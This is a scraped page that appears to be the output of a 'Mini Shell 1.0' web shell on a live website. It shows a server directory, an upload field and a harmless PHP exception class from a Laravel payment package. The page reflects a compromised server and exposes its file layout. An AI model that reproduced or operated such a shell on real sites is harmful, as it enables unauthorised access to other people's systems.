HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/vendor/sebacarrasco93/laravel-payku/src/Exceptions/
Upload File :
Current File : /var/www/devs.lapieza.net/vendor/sebacarrasco93/laravel-payku/src/Exceptions/MissingEnvKeys.php
<?php

namespace SebaCarrasco93\LaravelPayku\Exceptions;

use Exception;

class MissingEnvKeys extends Exception
{
    public $message;
    
    public function __construct()
    {
        $this->message = 'Please set all Payku keys in your .env file';
    }
}